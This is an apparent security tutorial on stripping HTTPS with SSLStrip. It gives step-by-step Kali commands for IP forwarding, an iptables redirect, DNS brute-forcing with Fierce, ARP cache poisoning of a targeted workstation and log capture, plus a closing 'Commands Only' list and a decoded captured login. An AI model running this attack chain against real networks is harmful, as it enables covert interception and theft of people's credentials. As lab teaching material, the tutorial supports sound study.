Attack Vector 2 – SSLStrip

A successful attack on SSL encryption requires tools other than Wireshark.  One such useful tool is SSLStrip.  This program is designed to hijack the SSL session and replace the SSL encryption with plain text.  This is done by monitoring all connection between the host system and the server.  SSLStrip then replaces https:// request with http:// requests.  The browser is faked into thinking it is still directly communicating directly with the server.

SSLStrip_1

A Normal SSL Connection

The above image shows a normal secure connection to a web server.  Data is passed directly from the user and the host over secure channels.  The user is relatively safe and secure.

SSLStrip_2

A SSL Connection Intercepted by SSLStrip

In this scenario the data is intercepted by using a MitM attack and the secure requests to the server are replaced with unsecured requests. Data that is then transmitted can be viewed in plain text.

The best way to learn a new program is to execute the help command.  The help command for SSLStrip follows the below syntax:

root@kali:~# sslstrip -h

SSLStrip-Help

 

SSLStrip Attack Process

The following sections cover each part of the attack.  These are covered in chronological order as you read though this page.  Use the following navigation to skip to specific sections, jump to the video tutorial, or review the commands only section.

 

Main Attack
Other

IP Forwarding

IP forwarding tells the Linux system to send packets to their proper destination.  This is needed before we attempt to issue ARP Cache Poising. This will ensure that packets will get sent to their proper destination after we have inserted ourselves as a MitM.  In essence, after we grab the network packets from the target system we have to pass them to their destination or we just create a denial of service (DoS).

Step 1: Setup IP forwarding

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Check to see ensure the command was executed correctly

root@kali:~# cat /proc/sys/net/ipv4/ip_forward

IPForward

IP Routing

Step 2: Redirect all packets going out on port 80 to port 8080.  This will route the outgoing connections from SSLStrip to port 8080.

root@kali:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Find Default Gateway

Step 3: Discover your current default gateway

root@kali:~# netstat -nr

DefaultGateway

 

Locate Target IP

There are several ways to discover the IP address of your target system.  Network enumeration, DNS enumeration, Active Directory fingerprinting, and Social Engineering to name a few.  Since the Raspberry Pi is already located on the host network we have the advantage of running several commands that can provide useful information.  One option could be a full scan of the entire network. Albeit a informative option, this may give away our Raspberry Pi and we want to maintain stealth access.

Another option is a full scan of the target networks DNS servers to see if they allow zone transfers. However, over the years several security measures have been put added to protect networks from such DNS attacks.  That said, by design a DNS server will always give you what you ask for if it knows the answer.  This is an inherent weakness; the trick is to know what to ask.  To get around this a brute force method is suggested.

Fierce is a program that will query a list of fully qualified domain names to a target DNS server within a specified domain. The goal is to find out what names are valid and return a target IP address.  Fierce has a database of 2,280 common names that are automatically tried by default.  The following domain names have been added to my ISP’s DNS, let’s find out how many are caught by the default setting of Fierce.

development.bahansen.info
frontdesk.bahansen.info
accounting.bahansen.info
ceolaptop.bahansen.info
workstation1.bahansen.info
workstation2.bahansen.info

Step 4: Locate target IP address

root@kali:~# fierce -dns bahansen.info

Fierce
Fierce found three of the six above entries, plus several default entries created by my host provider for essential services.

In my opinion the most enticing entry listed above would be accounting.bahansen.info that resolves to 192.168.2.87. Thus, we are going to move forward with our attack on the Accounting workstation. Now having the target system and default gateway we can now execute our attack.

MitM with ARPSpoof

ARPSpoof will issue a repeat command to tell the local network that the Raspberry Pi is now the Accounting system. The network will then send those packets to Kali Linux for us to intercept, the IP forwarding command in Step 1 will then pass those packet back and forth from the Accounting system to their destination.

The syntax for ARPSpoof follows: arpspoof -i interface -t target IP -r gateway IP

Step 5: Issue the ARP cache poisoning command using ARPSpoof

root@kali:~# arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1

This command will occupy the current command window. Be sure to leave ARPSpoof running and open a new connection to the Raspberry Pi to issue the final command.

Running SSLStrip

SSLStrip is an easy command line program that will attempt to replace secure encrypted webpages with their plain-text equivalent.

Step 6:Open a new ssh session

root@kali:~# ssh 192.168.11.15

 

Step 7: Start SSLStrip to monitor for data being sent out on port 8080

root@kali:~# sslstrip -l 8080

On the target computer open a browser and connect to www.facebook.com and log-in with your account.

Step 8: Stop SSLStrip

Ctrl + C

 

Step 8: Review the captured data

root@kali:~# more sslstrip.log

SSLStrip_Log

The “%40 is URL encoding for an “@”, and “%21” is URL encoding for the “!”, after decoding you get:

User Name: bahansen.us@outlook.com
Password: SecurityRocks!

Video Instructions

 

Commands Only

 

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
netstat -nr
fierce -dns bahansen.info
arpspoof -i eth0 -t 192.168.2.87 -r 192.168.2.1
sslstrip -l 8080
more sslstrip.log